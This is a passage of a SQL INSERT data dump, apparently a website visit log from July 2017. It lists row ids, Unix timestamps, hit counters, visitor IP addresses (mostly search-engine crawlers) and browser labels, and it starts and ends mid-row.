),(138269,1501224945,1,1,0,0,'217.182.132.179','other'),(138270,1501225014,1,1,0,0,'188.32.188.132','msie'),(138271,1501225054,1,1,0,0,'5.45.207.83','other'),(138272,1501225354,1,1,0,0,'5.45.207.56','other'),(138273,1501225663,1,1,0,0,'91.209.11.236','other'),(138274,1501225729,1,0,1,0,'68.180.230.48',''),(138275,1501225863,1,1,0,0,'178.154.171.45','other'),(138276,1501226167,1,1,0,0,'91.196.177.44','chrome'),(138277,1501226170,1,1,0,0,'95.108.181.57','other'),(138278,1501226276,1,1,0,0,'91.196.178.34','chrome'),(138279,1501226464,1,1,0,0,'178.92.205.164','firefox'),(138280,1501226541,1,1,0,0,'217.182.132.92','other'),(138281,1501226740,1,1,0,0,'5.45.207.64','other'),(138282,1501226768,1,1,0,0,'217.182.132.151','other'),(138283,1501226965,1,1,0,0,'217.182.132.21','other'),(138284,1501227042,1,1,0,0,'217.182.132.241','other'),(138285,1501227268,1,1,0,0,'51.255.65.7','other'),(138286,1501227292,4,4,0,0,'216.244.66.246','other'),(138287,1501227305,1,1,0,0,'51.255.71.125','other'),(138288,1501227463,1,1,0,0,'91.209.11.236','other'),(138289,1501227641,1,1,0,0,'51.255.65.50','other'),(138290,1501227819,1,1,0,0,'216.244.66.194','other'),(138291,1501228029,1,1,0,0,'217.69.133.9','other'),(138292,1501228030,1,1,0,0,'217.69.133.194','other'),(138293,1501228066,1,1,0,0,'51.255.65.18','other'),(138294,1501228259,1,1,0,0,'51.255.65.97','other'),(138295,1501228344,1,1,0,0,'51.255.64.106','other'),(138296,1501228737,1,1,0,0,'91.196.178.65','firefox'),(138297,1501228820,1,0,1,0,'66.249.66.155',''),(138298,1501228931,1,1,0,0,'95.47.104.157','firefox'),(138299,1501229089,1,1,0,0,'51.255.65.10','other'),(138300,1501229116,1,1,0,0,'91.209.11.236','other'),(138301,1501229139,1,1,0,0,'91.196.178.133','chrome'),(138302,1501229234,1,1,0,0,'91.196.178.68','firefox'),(138303,1501229295,6,6,0,0,'216.244.66.246','other'),(138304,1501229403,1,1,0,0,'51.255.65.69','other'),(138305,1501229620,1,1,0,0,'180.76.15.9','other'),(138306,1501230360,1,1,0,0,'91.196.178.161','chrome'),(138307,1501230545,1,1,0,0,'176.15.198.120','msie'),(138308,1501230753,1,1,0,0,'66.249.76.91','chrome'),(138309,1501230782,1,0,1,0,'66.249.66.155',''),(138310,1501230793,1,1,0,0,'8.29.198.27','other'),(138311,1501231689,1,1,0,0,'217.182.132.50','other'),(138312,1501231869,1,1,0,0,'217.182.132.186','other'),(138313,1501231921,1,1,0,0,'91.196.178.68','chrome'),(138314,1501232026,8,8,0,0,'216.244.66.194','other'),(138315,1501232158,1,1,0,0,'31.43.12.191','chrome'),(138316,1501232551,1,1,0,0,'178.154.171.3','other'),(138317,1501232613,1,1,0,0,'95.108.181.63','other'),(138318,1501232926,1,1,0,0,'217.182.132.148','other'),(138319,1501233048,1,1,0,0,'91.209.11.236','other'),(138320,1501233096,1,1,0,0,'95.108.181.57','other'),(138321,1501233203,1,1,0,0,'5.45.207.66','other'),(138322,1501233210,1,1,0,0,'91.196.178.68','chrome'),(138323,1501233277,1,1,0,0,'78.154.176.40','chrome'),(138324,1501233587,1,1,0,0,'5.45.207.56','other'),(138325,1501233591,1,1,0,0,'213.180.203.14','other'),(138326,1501233739,1,1,0,0,'217.69.133.194','other'),(138327,1501233949,1,1,0,0,'95.132.133.187','chrome'),(138328,1501233951,1,1,0,0,'95.108.181.60','other'),(138329,1501234170,1,1,0,0,'91.196.178.68','chrome'),(138330,1501234202,1,1,0,0,'95.108.181.52','other'),(138331,1501234317,1,1,0,0,'178.154.171.59','other'),(138332,1501234688,2,2,0,0,'216.244.66.194','other'),(138333,1501234863,2,2,0,0,'91.209.11.236','other'),(138334,1501235101,1,1,0,0,'91.196.178.162','chrome'),(138335,1501235118,1,0,1,0,'66.249.66.156',''),(138336,1501235213,1,1,0,0,'51.255.71.131','other'),(138337,1501235260,1,1,0,0,'216.244.66.246','other'),(138338,1501235454,1,1,0,0,'217.69.133.6','other'),(138339,1501235562,1,1,0,0,'213.180.203.43','other'),(138340,1501235731,1,1,0,0,'51.255.71.123','other'),(138341,1501236131,1,1,0,0,'51.255.65.34','other'),(138342,1501236148,2,2,0,0,'91.209.11.236','other'),(138343,1501236227,1,1,0,0,'91.196.178.71','firefox'),(138344,1501236346,1,1,0,0,'51.255.65.60','other'),(138345,1501236349,1,1,0,0,'46.201.175.91','firefox'),(138346,1501236568,1,1,0,0,'157.55.39.91','other'),(138347,1501236873,1,1,0,0,'217.182.132.85','other'),(138348,1501237305,1,1,0,0,'37.9.113.94','other'),(138349,1501237426,1,1,0,0,'178.154.171.42','other'),(138350,1501237465,1,1,0,0,'217.182.132.71','other'),(138351,1501237509,1,1,0,0,'95.220.53.229','chrome'),(138352,1501237665,1,1,0,0,'46.201.186.79','opera'),(138353,1501237766,1,1,0,0,'82.145.222.142','other'),(138354,1501238067,1,1,0,0,'213.180.203.18','other'),(138355,1501238242,6,6,0,0,'216.244.66.246','other'),(138356,1501238515,1,1,0,0,'217.182.132.29','other'),(138357,1501238574,1,1,0,0,'37.9.113.138','other'),(138358,1501239043,1,1,0,0,'37.9.113.128','other'),(138359,1501239160,1,1,0,0,'51.255.65.78','other'),(138360,1501239307,1,1,0,0,'37.9.113.78','other'),(138361,1501239622,1,1,0,0,'217.182.132.183','other'),(138362,1501239880,1,1,0,0,'213.180.203.14','other'),(138363,1501240268,1,1,0,0,'37.73.232.117','chrome'),(138364,1501240373,1,1,0,0,'178.154.171.53','other'),(138365,1501240396,1,1,0,0,'217.182.132.37','other'),(138366,1501240427,1,1,0,0,'91.209.11.236','other'),(138367,1501240539,1,1,0,0,'217.182.132.70','other'),(138368,1501240907,1,1,0,0,'66.102.9.29','chrome'),(138369,1501241467,2,2,0,0,'91.209.11.236','other'),(138370,1501241622,1,1,0,0,'217.182.132.30','other'),(138371,1501241645,1,1,0,0,'8.29.198.27','other'),(138372,1501241900,1,1,0,0,'91.196.177.46','chrome'),(138373,1501241980,1,1,0,0,'91.196.177.46','other'),(138374,1501242017,2,2,0,0,'216.244.66.194','other'),(138375,1501242784,1,1,0,0,'216.244.66.246','other'),(138376,1501243102,1,1,0,0,'46.174.163.134','chrome'),(138377,1501243104,1,1,0,0,'91.196.178.67','firefox'),(138378,1501243311,1,1,0,0,'91.209.11.236','other'),(138379,1501243388,1,1,0,0,'51.255.65.96','other'),(138380,1501243398,4,4,0,0,'216.244.66.194','other'),(138381,1501243931,1,1,0,0,'217.182.132.77','other'),(138382,1501244105,1,1,0,0,'217.182.132.154','other'),(138383,1501244406,1,1,0,0,'217.182.132.78','other'),(138384,1501244741,1,1,0,0,'37.55.59.154','chrome'),(138385,1501244942,1,1,0,0,'217.182.132.188','other'),(138386,1501245156,1,1,0,0,'91.209.11.236','other'),(138387,1501245786,4,4,0,0,'216.244.66.246','other'),(138388,1501246365,1,1,0,0,'51.255.65.73','other'),(138389,1501246372,1,1,0,0,'46.174.163.134','chrome'),(138390,1501246698,1,1,0,0,'207.46.13.95','other'),(138391,1501247031,1,1,0,0,'46.201.33.151','chrome'),(138392,1501247051,1,1,0,0,'91.209.11.236','other'),(138393,1501247284,1,1,0,0,'151.80.27.116','other'),(138394,1501247327,1,1,0,0,'217.182.132.192','other'),(138395,1501247506,2,2,0,0,'91.196.178.35','chrome'),(138396,1501247617,1,1,0,0,'51.255.65.2','other'),(138397,1501248141,1,1,0,0,'180.76.15.12','other'),(138398,1501248311,1,1,0,0,'217.182.132.52','other'),(138399,1501248732,1,1,0,0,'91.209.11.236','other'),(138400,1501248764,1,1,0,0,'217.182.132.61','other'),(138401,1501249067,1,1,0,0,'37.73.229.52','chrome'),(138402,1501249286,2,2,0,0,'216.244.66.194','other'),(138403,1501249302,1,1,0,0,'213.180.203.25','other'),(138404,1501249320,1,1,0,0,'91.196.178.163','chrome'),(138405,1501249461,1,1,0,0,'37.9.113.128','other'),(138406,1501249826,1,1,0,0,'51.255.65.90','other'),(138407,1501249978,2,2,0,0,'216.244.66.246','other'),(138408,1501250092,1,1,0,0,'51.255.65.10','other'),(138409,1501250483,1,1,0,0,'51.255.71.111','other'),(138410,1501250519,1,1,0,0,'213.180.203.32','other'),(138411,1501250532,1,1,0,0,'66.249.66.74','chrome'),(138412,1501250549,1,1,0,0,'51.255.71.120','other'),(138413,1501250630,4,4,0,0,'216.244.66.194','other'),(138414,1501250785,2,2,0,0,'51.255.71.129','other'),(138415,1501251147,1,1,0,0,'91.196.178.66','chrome'),(138416,1501251374,1,1,0,0,'51.255.65.22','other'),(138417,1501251758,1,1,0,0,'194.44.159.41','chrome'),(138418,1501251951,2,2,0,0,'207.46.13.95','other'),(138419,1501252075,1,1,0,0,'51.255.65.93','other'),(138420,1501252223,1,1,0,0,'95.108.181.63','other'),(138421,1501252351,1,1,0,0,'51.255.65.90','other'),(138422,1501252486,1,1,0,0,'8.29.198.25','other'),(138423,1501253349,3,3,0,0,'163.172.108.151','chrome'),(138424,1501253456,1,1,0,0,'207.46.13.186','other'),(138425,1501253705,1,0,1,0,'66.249.76.108',''),(138426,1501253722,1,1,0,0,'213.180.203.32','other'),(138427,1501253929,1,1,0,0,'151.80.27.116','other'),(138428,1501253974,1,1,0,0,'95.108.181.63','other'),(138429,1501254184,1,1,0,0,'95.108.181.52','other'),(138430,1501254577,1,1,0,0,'137.74.207.101','other'),(138431,1501254788,1,1,0,0,'207.46.13.169','other'),(138432,1501255445,7,7,0,0,'176.9.11.125','other'),(138433,1501255896,1,0,1,0,'66.249.76.108',''),(138434,1501255931,1,1,0,0,'37.9.113.138','other'),(138435,1501256188,1,1,0,0,'178.154.171.42','other'),(138436,1501256284,1,1,0,0,'95.108.181.60','other'),(138437,1501256312,1,1,0,0,'37.55.57.32','chrome'),(138438,1501256445,1,1,0,0,'91.209.11.236','other'),(138439,1501256633,2,2,0,0,'216.244.66.194','other'),(138440,1501256806,1,1,0,0,'137.74.207.108','other'),(138441,1501257245,1,1,0,0,'207.46.13.95','other'),(138442,1501257413,1,1,0,0,'217.182.132.20','other'),(138443,1501257576,1,1,0,0,'37.55.57.32','chrome'),(138444,1501257708,2,2,0,0,'216.244.66.246','other'),(138445,1501257731,1,1,0,0,'217.182.132.59','other'),(138446,1501257780,1,1,0,0,'164.132.162.156','other'),(138447,1501258057,1,1,0,0,'137.74.207.101','other'),(138448,1501258211,1,1,0,0,'178.154.171.18','other'),(138449,1501258690,1,1,0,0,'66.249.66.157','chrome'),(138450,1501258959,5,5,0,0,'216.244.66.246','other'),(138451,1501259002,1,1,0,0,'178.154.171.59','other'),(138452,1501259077,1,1,0,0,'217.182.132.64','other'),(138453,1501259765,1,0,1,0,'66.249.76.107',''),(138454,1501259930,1,1,0,0,'5.45.207.64','other'),(138455,1501260199,1,1,0,0,'217.182.132.14','other'),(138456,1501260424,1,1,0,0,'51.255.65.72','other'),(138457,1501260693,1,1,0,0,'213.180.203.14','other'),(138458,1501260759,1,1,0,0,'46.161.9.39','chrome'),(138459,1501260909,1,1,0,0,'51.255.71.116','other'),(138460,1501260969,4,4,0,0,'216.244.66.194','other'),(138461,1501261289,1,1,0,0,'77.122.237.60','chrome'),(138462,1501261763,3,3,0,0,'178.137.211.68','chrome'),(138463,1501262234,1,1,0,0,'213.180.203.25','other'),(138464,1501262237,1,1,0,0,'217.182.132.32','other'),(138465,1501262398,1,1,0,0,'213.180.203.14','other'),(138466,1501262436,1,1,0,0,'46.211.146.76','other'),(138467,1501263039,1,1,0,0,'91.209.11.236','other'),(138468,1501263312,1,1,0,0,'51.255.65.89','other'),(138469,1501263323,1,1,0,0,'8.29.198.27','other'),(138470,1501263647,1,1,0,0,'217.182.132.177','other'),(138471,1501264388,1,1,0,0,'217.69.133.4','other'),(138472,1501264804,1,1,0,0,'51.255.65.54','other'),(138473,1501265053,1,0,1,0,'66.249.76.91',''),(138474,1501265108,1,1,0,0,'66.249.76.93','chrome'),(138475,1501265210,1,1,0,0,'37.73.233.120','chrome'),(138476,1501265420,1,1,0,0,'37.9.113.94','other'),(138477,1501265427,1,1,0,0,'5.45.207.57','other'),(138478,1501265561,1,1,0,0,'95.108.181.60','other'),(138479,1501265755,1,1,0,0,'95.132.33.88','firefox'),(138480,1501265932,1,1,0,0,'176.113.170.104','firefox'),(138481,1501265955,1,1,0,0,'217.182.132.86','other'),(138482,1501265982,1,1,0,0,'217.182.132.92','other'),(138483,1501266073,1,1,0,0,'5.45.207.66','other'),(138484,1501266257,1,1,0,0,'51.255.65.22','other'),(138485,1501266818,1,1,0,0,'217.182.132.59','other'),(138486,1501267010,3,3,0,0,'216.244.66.194','other'),(138487,1501267714,1,1,0,0,'66.249.76.107','chrome'),(138488,1501268382,1,1,0,0,'164.132.162.155','other'),(138489,1501268415,1,1,0,0,'137.74.207.116','other'),(138490,1501268460,1,1,0,0,'51.255.65.16','other'),(138491,1501269123,1,1,0,0,'95.108.181.60','other'),(138492,1501269439,8,8,0,0,'216.244.66.246','other'),(138493,1501269973,1,1,0,0,'217.182.132.186','other'),(138494,1501270063,1,1,0,0,'95.108.181.57','other'),(138495,1501270069,1,1,0,0,'217.182.132.79','other'),(138496,1501270203,1,1,0,0,'178.154.171.18','other'),(138497,1501270595,2,2,0,0,'216.244.66.194','other'),(138498,1501270775,1,1,0,0,'188.166.71.201','chrome'),(138499,1501270926,1,1,0,0,'207.46.13.95','other'),(138500,1501271275,1,1,0,0,'95.108.181.57','other'),(138501,1501271651,1,1,0,0,'137.74.207.170','other'),(138502,1501271655,1,1,0,0,'217.182.132.66','other'),(138503,1501271754,1,0,1,0,'66.249.66.156',''),(138504,1501272159,1,1,0,0,'51.255.65.90','other'),(138505,1501272249,1,1,0,0,'91.209.11.236','other'),(138506,1501273149,1,1,0,0,'51.255.65.10','other'),(138507,1501273438,1,1,0,0,'216.244.66.194','other'),(138508,1501274111,1,1,0,0,'178.154.171.53','other'),(138509,1501274162,1,1,0,0,'8.29.198.27','other'),(138510,1501274302,1,1,0,0,'91.196.178.167','chrome'),(138511,1501274400,1,1,0,0,'178.154.171.42','other'),(138512,1501274440,1,1,0,0,'91.209.11.236','other'),(138513,1501274490,1,1,0,0,'5.45.207.57','other'),(138514,1501274653,1,1,0,0,'51.255.65.31','other'),(138515,1501275091,1,1,0,0,'217.182.132.241','other'),(138516,1501275220,1,0,1,0,'66.249.66.155',''),(138517,1501275456,2,0,2,0,'66.249.76.108',''),(138518,1501275769,1,1,0,0,'37.9.113.128','other'),(138519,1501275932,1,1,0,0,'217.69.133.203','other'),(138520,1501276038,1,1,0,0,'94.179.44.116','chrome'),(138521,1501276129,1,0,1,0,'66.249.76.109',''),(138522,1501276216,1,1,0,0,'178.154.171.53','other'),(138523,1501276267,1,1,0,0,'216.244.66.246','other'),(138524,1501276339,1,0,1,0,'66.249.66.76',''),(138525,1501276496,2,0,2,0,'66.249.66.75',''),(138526,1501276962,1,1,0,0,'51.255.65.86','other'),(138527,1501277092,1,1,0,0,'94.179.44.116','chrome'),(138528,1501277292,1,1,0,0,'216.244.66.194','other'),(138529,1501277364,1,1,0,0,'213.180.203.42','other'),(138530,1501277409,2,2,0,0,'108.59.8.70','other'),(138531,1501277897,1,1,0,0,'51.255.71.125','other'),(138532,1501277965,1,1,0,0,'217.182.132.51','other'),(138533,1501278030,1,0,1,0,'66.249.66.76',''),(138534,1501278341,1,1,0,0,'95.108.181.69','other'),(138535,1501278368,1,1,0,0,'217.182.132.86','other'),(138536,1501278502,1,1,0,0,'95.108.181.63','other'),(138537,1501279259,1,1,0,0,'51.255.65.80','other'),(138538,1501279688,1,1,0,0,'164.132.162.155','other'),(138539,1501279821,4,4,0,0,'216.244.66.246','other'),(138540,1501279856,1,1,0,0,'217.69.133.2','other'),(138541,1501280571,1,1,0,0,'51.255.65.91','other'),(138542,1501280836,1,1,0,0,'207.46.13.179','other'),(138543,1501281351,1,1,0,0,'91.209.11.236','other'),(138544,1501281474,1,1,0,0,'217.182.132.69','other'),(138545,1501281656,1,1,0,0,'46.161.9.39','chrome'),(138546,1501281700,1,1,0,0,'217.69.133.9','other'),(138547,1501282053,8,8,0,0,'216.244.66.194','other'),(138548,1501282127,1,1,0,0,'217.182.132.155','other'),(138549,1501282181,1,1,0,0,'180.76.15.23','other'),(138550,1501282192,1,1,0,0,'217.182.132.7','other'),(138551,1501282735,2,2,0,0,'91.209.11.236','other'),(138552,1501282856,1,1,0,0,'5.45.207.57','other'),(138553,1501283960,1,1,0,0,'95.108.181.60','other'),(138554,1501284004,1,1,0,0,'5.45.207.64','other'),(138555,1501284054,1,1,0,0,'164.132.162.153','other'),(138556,1501284424,1,1,0,0,'213.180.203.21','other'),(138557,1501284554,1,1,0,0,'91.209.11.236','other'),(138558,1501284998,1,1,0,0,'8.29.198.26','other'),(138559,1501285502,1,1,0,0,'137.74.207.188','other'),(138560,1501285515,1,1,0,0,'217.182.132.56','other'),(138561,1501285560,1,1,0,0,'217.182.132.182','other'),(138562,1501285712,1,1,0,0,'217.182.132.240','other'),(138563,1501286016,2,2,0,0,'217.182.132.88','other'),(138564,1501286196,1,1,0,0,'180.76.15.22','other'),(138565,1501286256,1,1,0,0,'217.182.132.150','other'),(138566,1501286464,1,1,0,0,'164.132.162.157','other'),(138567,1501286741,1,1,0,0,'5.45.207.57','other'),(138568,1501287112,1,1,0,0,'217.182.132.176','other'),(138569,1501287186,4,4,0,0,'216.244.66.194','other'),(138570,1501287463,1,1,0,0,'213.180.203.43','other'),(138571,1501287691,1,1,0,0,'37.9.113.94','other'),(138572,1501287769,1,0,1,0,'66.249.66.157',''),(138573,1501287988,1,1,0,0,'178.154.171.59','other'),(138574,1501288029,1,1,0,0,'164.132.162.154','other'),(138575,1501288129,1,1,0,0,'51.255.65.29','other'),(138576,1501288524,1,1,0,0,'91.209.11.236','other'),(138577,1501288880,1,1,0,0,'51.255.65.94','other'),(138578,1501289023,1,1,0,0,'51.255.65.13','other'),(138579,1501289375,1,1,0,0,'213.180.203.14','other'),(138580,1501289692,1,1,0,0,'213.180.203.43','other'),(138581,1501289822,1,0,1,0,'66.249.76.93',''),(138582,1501290157,1,1,0,0,'51.255.65.27','other'),(138583,1501290198,1,1,0,0,'66.249.66.156','chrome'),(138584,1501290351,1,1,0,0,'51.255.65.10','other'),(138585,1501290593,7,7,0,0,'216.244.66.246','other'),(138586,1501290642,2,2,0,0,'91.209.11.236','other'),(138587,1501290852,3,3,0,0,'216.244.66.194','other'),(138588,1501290880,1,1,0,0,'137.74.207.108','other'),(138589,1501291119,1,1,0,0,'217.182.132.94','other'),(138590,1501291400,1,1,0,0,'37.9.113.138','other'),(138591,1501291560,1,1,0,0,'66.249.76.89','chrome'),(138592,1501291606,1,1,0,0,'51.255.65.20','other'),(138593,1501291667,1,1,0,0,'95.108.181.60','other'),(138594,1501291721,1,0,1,0,'66.249.66.76',''),(138595,1501291849,1,1,0,0,'217.182.132.15','other'),(138596,1501291961,1,1,0,0,'91.209.11.236','other'),(138597,1501292018,1,1,0,0,'217.182.132.188','other'),(138598,1501292037,1,1,0,0,'180.76.15.155','other'),(138599,1501292621,1,1,0,0,'5.45.207.66','other'),(138600,1501293242,1,1,0,0,'217.69.133.194','other'),(138601,1501293255,1,1,0,0,'217.69.133.4','other'),(138602,1501293588,1,1,0,0,'5.45.207.57','other'),(138603,1501293632,1,1,0,0,'217.182.132.240','other'),(138604,1501293948,1,1,0,0,'51.255.65.4','other'),(138605,1501294718,1,0,1,0,'66.249.66.156',''),(138606,1501294863,1,1,0,0,'107.167.110.12','other'),(138607,1501295025,1,1,0,0,'51.255.71.116','other'),(138608,1501295420,1,1,0,0,'217.182.132.172','other'),(138609,1501295833,1,1,0,0,'8.29.198.27','other'),(138610,1501295953,1,1,0,0,'217.182.132.17','other'),(138611,1501295977,1,1,0,0,'217.182.132.69','other'),(138612,1501296759,1,1,0,0,'207.46.13.1','other'),(138613,1501297607,1,1,0,0,'51.255.65.66','other'),(138614,1501298024,1,1,0,0,'178.154.171.42','other'),(138615,1501298070,1,1,0,0,'216.244.66.246','other'),(138616,1501298417,5,5,0,0,'216.244.66.194','other'),(138617,1501298795,1,1,0,0,'213.180.203.25','other'),(138618,1501299246,1,1,0,0,'5.45.207.64','other'),(138619,1501299772,2,2,0,0,'213.180.203.43','other'),(138620,1501300249,1,1,0,0,'178.154.171.59','other'),(138621,1501300544,1,1,0,0,'217.182.132.69','other'),(138622,1501300781,1,1,0,0,'5.45.207.57','other'),(138623,1501300815,1,1,0,0,'178.154.171.45','other'),(138624,1501300958,7,7,0,0,'216.244.66.246','other'),(138625,1501300962,1,1,0,0,'207.46.13.1','other'),(138626,1501301187,1,1,0,0,'213.180.203.18','other'),(138627,1501301863,5,5,0,0,'216.244.66.246','other'),(138628,1501301886,1,1,0,0,'51.255.71.118','other'),(138629,1501302145,1,0,1,0,'66.249.66.74',''),(138630,1501302581,1,0,1,0,'68.180.229.223',''),(138631,1501302599,1,1,0,0,'217.182.132.37','other'),(138632,1501302872,1,1,0,0,'5.45.207.64','other'),(138633,1501303318,5,5,0,0,'216.244.66.194','other'),(138634,1501303968,1,1,0,0,'217.182.132.96','other'),(138635,1501304162,1,1,0,0,'5.45.207.56','other'),(138636,1501305429,1,0,1,0,'66.249.76.107',''),(138637,1501305720,1,0,1,0,'66.249.76.91',''),(138638,1501305818,1,0,1,0,'66.249.76.108',''),(138639,1501305982,1,1,0,0,'213.180.203.32','other'),(138640,1501306023,1,1,0,0,'178.154.171.59','other'),(138641,1501306669,1,1,0,0,'8.29.198.25','other'),(138642,1501306831,1,1,0,0,'137.74.207.188','other'),(138643,1501306962,1,1,0,0,'217.182.132.70','other'),(138644,1501307861,1,0,1,0,'66.249.66.155',''),(138645,1501308081,1,1,0,0,'217.182.132.73','other'),(138646,1501308256,1,1,0,0,'217.182.132.50','other'),(138647,1501308725,1,1,0,0,'216.244.66.246','other'),(138648,1501308761,9,9,0,0,'216.244.66.194','other'),(138649,1501308898,2,2,0,0,'91.209.11.236','other'),(138650,1501309515,1,1,0,0,'213.180.203.25','other'),(138651,1501309845,1,1,0,0,'51.255.65.36','other'),(138652,1501310391,1,1,0,0,'66.249.66.156','chrome'),(138653,1501310560,1,1,0,0,'217.69.133.194','other'),(138654,1501310646,5,5,0,0,'216.244.66.194','other'),(138655,1501310665,1,1,0,0,'217.182.132.147','other'),(138656,1501310976,1,1,0,0,'178.154.171.59','other'),(138657,1501311307,1,1,0,0,'81.177.183.64','firefox'),(138658,1501311393,1,1,0,0,'217.182.132.18','other'),(138659,1501311499,1,0,1,0,'66.249.76.109',''),(138660,1501311546,1,1,0,0,'51.255.71.128','other'),(138661,1501311575,1,1,0,0,'66.249.76.91','chrome'),(138662,1501312297,6,6,0,0,'216.244.66.246','other'),(138663,1501312300,1,1,0,0,'95.108.181.63','other'),(138664,1501312470,1,1,0,0,'51.255.65.48','other'),(138665,1501312483,1,1,0,0,'65.49.2.180','other'),(138666,1501312578,1,1,0,0,'37.9.113.138','other'),(138667,1501312681,6,6,0,0,'62.210.251.247','other'),(138668,1501312798,2,2,0,0,'178.154.171.53','other'),(138669,1501312802,1,1,0,0,'37.9.113.137','other'),(138670,1501312853,1,1,0,0,'217.182.132.187','other'),(138671,1501312922,1,1,0,0,'91.196.178.98','chrome'),(138672,1501312991,1,1,0,0,'51.255.65.83','other'),(138673,1501313450,1,1,0,0,'91.209.11.236','other'),(138674,1501313651,1,1,0,0,'5.45.207.64','other'),(138675,1501314025,1,0,1,0,'66.249.66.156',''),(138676,1501314402,1,1,0,0,'178.154.171.59','other'),(138677,1501314480,1,1,0,0,'51.255.71.98','other'),(138678,1501314603,1,1,0,0,'5.45.207.66','other'),(138679,1501314608,1,1,0,0,'217.182.132.5','other'),(138680,1501314609,1,1,0,0,'217.182.132.86','other'),(138681,1501314914,2,2,0,0,'62.210.203.161','chrome'),(138682,1501315309,1,1,0,0,'217.182.132.155','other'),(138683,1501315331,1,1,0,0,'51.255.71.110','other'),(138684,1501315395,1,1,0,0,'180.76.15.159','other'),(138685,1501315500,1,1,0,0,'51.255.65.76','other'),(138686,1501315584,1,1,0,0,'5.45.207.64','other'),(138687,1501315620,1,1,0,0,'37.73.229.194','chrome'),(138688,1501315631,1,1,0,0,'213.180.203.25','other'),(138689,1501315672,1,1,0,0,'91.196.178.72','firefox'),(138690,1501316648,1,1,0,0,'51.255.65.37','other'),(138691,1501317042,1,1,0,0,'51.255.65.89','other'),(138692,1501317137,1,1,0,0,'66.249.76.109','chrome'),(138693,1501317208,1,1,0,0,'217.182.132.79','other'),(138694,1501317258,1,1,0,0,'217.182.132.151','other'),(138695,1501317371,1,1,0,0,'51.255.65.224','other'),(138696,1501317505,1,1,0,0,'8.29.198.27','other'),(138697,1501318350,4,4,0,0,'173.212.194.83','other'),(138698,1501318875,3,3,0,0,'216.244.66.194','other'),(138699,1501318944,1,1,0,0,'217.182.132.7','other'),(138700,1501319585,1,1,0,0,'217.182.132.15','other'),(138701,1501320222,1,1,0,0,'217.69.133.4','other'),(138702,1501320235,1,1,0,0,'95.108.181.52','other'),(138703,1501320320,2,2,0,0,'46.165.197.141','other'),(138704,1501320492,1,1,0,0,'164.132.162.155','other'),(138705,1501320627,3,3,0,0,'216.244.66.194','other'),(138706,1501320923,1,1,0,0,'37.9.113.138','other'),(138707,1501321304,1,1,0,0,'217.182.132.80','other'),(138708,1501321685,1,0,1,0,'66.249.66.157',''),(138709,1501322493,1,1,0,0,'213.180.203.18','other'),(138710,1501322889,6,6,0,0,'216.244.66.246','other'),(138711,1501324578,1,0,1,0,'66.249.66.155',''),(138712,1501324656,1,1,0,0,'95.108.181.60','other'),(138713,1501325056,29,29,0,0,'46.4.32.75','other'),(138714,1501325811,1,1,0,0,'217.182.132.25','other'),(138715,1501325824,1,1,0,0,'213.180.203.42','other'),(138716,1501325891,1,1,0,0,'217.182.132.60','other'),(138717,1501326120,3,3,0,0,'216.244.66.194','other'),(138718,1501326137,1,1,0,0,'213.180.203.18','other'),(138719,1501326335,1,1,0,0,'178.154.171.53','other'),(138720,1501326650,1,1,0,0,'95.108.181.58','other'),(138721,1501326872,1,1,0,0,'51.255.65.52','other'),(138722,1501327182,1,0,1,0,'66.249.66.155',''),(138723,1501327748,1,1,0,0,'95.108.181.63','other'),(138724,1501327788,1,1,0,0,'94.179.44.116','chrome'),(138725,1501327867,1,1,0,0,'51.255.65.80','other'),(138726,1501328301,1,1,0,0,'217.182.132.76','other'),(138727,1501328303,1,1,0,0,'51.255.71.114','other'),(138728,1501328362,1,1,0,0,'8.29.198.26','other'),(138729,1501329077,1,1,0,0,'66.249.66.156','chrome'),(138730,1501329722,1,1,0,0,'217.182.132.77','other'),(138731,1501329941,1,1,0,0,'37.9.113.94','other'),(138732,1501329944,1,1,0,0,'213.180.203.19','other'),(138733,1501330021,1,1,0,0,'37.9.113.138','other'),(138734,1501330055,1,1,0,0,'178.154.171.53','other'),(138735,1501330425,1,1,0,0,'51.255.65.35','other'),(138736,1501330568,1,1,0,0,'81.209.177.189','other'),(138737,1501332220,4,4,0,0,'216.244.66.194','other'),(138738,1501332366,1,1,0,0,'66.102.9.29','chrome'),(138739,1501332575,1,1,0,0,'37.9.113.99','other'),(138740,1501332817,1,1,0,0,'5.45.207.64','other'),(138741,1501333179,1,1,0,0,'51.255.65.29','other'),(138742,1501333213,2,2,0,0,'216.244.66.246','other'),(138743,1501333457,1,1,0,0,'178.154.171.18','other'),(138744,1501333655,1,1,0,0,'37.73.226.95','chrome'),(138745,1501333887,1,0,1,0,'66.249.66.74',''),(138746,1501333896,1,1,0,0,'66.249.66.74','chrome'),(138747,1501334031,1,1,0,0,'51.255.65.71','other'),(138748,1501334058,1,1,0,0,'51.255.65.3','other'),(138749,1501334281,1,1,0,0,'37.9.113.78','other'),(138750,1501334313,1,1,0,0,'51.255.71.130','other'),(138751,1501334642,1,1,0,0,'217.182.132.83','other'),(138752,1501334685,1,1,0,0,'216.244.66.194','other'),(138753,1501334730,1,1,0,0,'137.74.207.164','other'),(138754,1501335236,1,1,0,0,'91.209.11.236','other'),(138755,1501335436,1,1,0,0,'217.182.132.61','other'),(138756,1501335563,1,1,0,0,'51.255.71.121','other'),(138757,1501335647,1,1,0,0,'51.255.65.82','other'),(138758,1501335955,1,1,0,0,'216.244.66.246','other'),(138759,1501336301,1,1,0,0,'178.154.171.59','other'),(138760,1501336483,1,1,0,0,'51.255.65.18','other'),(138761,1501336654,1,1,0,0,'91.209.11.236','other'),(138762,1501336765,1,1,0,0,'217.182.132.84','other'),(138763,1501336811,1,1,0,0,'51.255.71.113','other'),(138764,1501337889,1,1,0,0,'217.182.132.75','other'),(138765,1501338187,1,0,1,0,'66.249.66.157',''),(138766,1501338444,1,0,1,0,'66.249.66.156',''),(138767,1501338460,1,1,0,0,'51.255.71.120','other'),(138768,1501338581,1,1,0,0,'95.108.181.69','other'),(138769,1501338656,1,0,1,0,'66.249.76.109',''),(138770,1501338838,3,3,0,0,'216.244.66.194','other'),(138771,1501339193,1,1,0,0,'8.29.198.25','other'),(138772,1501339387,1,1,0,0,'51.255.65.39','other'),(138773,1501339441,1,1,0,0,'217.182.132.52','other'),(138774,1501339864,1,1,0,0,'213.180.203.14','other'),(138775,1501339984,1,1,0,0,'51.255.65.29','other'),(138776,1501340089,1,1,0,0,'164.132.162.157','other'),(138777,1501340658,1,1,0,0,'51.255.65.48','other'),(138778,1501340676,2,2,0,0,'216.244.66.246','other'),(138779,1501341830,1,1,0,0,'137.74.207.109','other'),(138780,1501341890,1,1,0,0,'164.132.162.154','other'),(138781,1501342356,1,1,0,0,'51.255.71.115','other'),(138782,1501342985,1,1,0,0,'207.46.1